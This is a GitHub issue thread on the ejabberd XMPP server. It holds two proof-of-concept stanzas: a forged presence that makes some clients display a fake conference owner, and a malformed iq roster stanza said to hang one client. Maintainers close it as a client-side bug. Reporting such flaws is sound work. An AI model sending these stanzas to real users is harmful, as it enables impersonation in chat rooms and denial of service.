### ISSUE TITLE
fake owner && hang user connection

### ISSUE THREAD

**Issue by deounix** [processone/ejabberd#2190]
> What version of ejabberd are you using?

17.9

> What operating system (version) are you using?

Ubuntu 16.04

> How did you install ejabberd (source, package, distribution)?

Source

1. GET FAKE OWNER IN CONFERENCE

```xml
<presence to="room1@conference.example.com/user1">
  <show>chat</show>
  <status/>
  <error code=""/>
  <x xmlns:m="http://jabber.org/protocol/muc#user">
    <item affiliation="owner" role="moderator" jid="owner@example.com/ss"/>
  </x>
</presence>
```

This will get u a fake owner in conference.

2. HANG USERS CONNECTION

```xml
<iq to="user@example.com/res_8056f24b705b3339" type="get" id="getrdsdsdos">
<jåNcøg xmlns="jabber:iq:roster"/</iq>
```

This will hang the user : user@example.com. Error here from None English words in packet

i.e : 

```
<iq to="user@example.com/res_8056f24b705b3339" type="get" id="getrdsdsdos">
<ArabicWordمرحبا xmlns="jabber:iq:roster"/</iq>
```

**Comment by zinid** [comment]
1. What clients can be fooled with such stanza? I tested Psi and it's fine
2. What clients hang by this stanza?

**Comment by deounix** [comment]
1. Qip, Sawim, Talkonaut

![pic-20171228-043957](https://user-images.githubusercontent.com/17798647/34398668-6bf117fa-eb89-11e7-8dad-e111cf541970.png)

2. Sawim

**Comment by deounix** [comment]
In first stanza if we change (xmlns:m) to (xmlns) nothing happened.

**Comment by zinid** [comment]
So? Isn't this a client problem?
I just checked: ejabberd routes those stanzas untouched, what is wrong with this?

**Comment by deounix** [comment]
Client's fooled after server respond I think we can fix this by drop this packet (Server must not respond at all) to packet like this.

**Comment by zinid** [comment]
> Server must not respond at all

Why? I see no standards violation here.

**Comment by cromain** [comment]
this is a client issue. closing this as server does what's expected.

**Comment by deounix** [comment]
how can I catch Non English word like this 

```
<iq to="user@example.com/res_8056f24b705b3339" type="get" id="getrdsdsdos">
<ArabicWordمرحبا xmlns="jabber:iq:roster"/</iq>
```
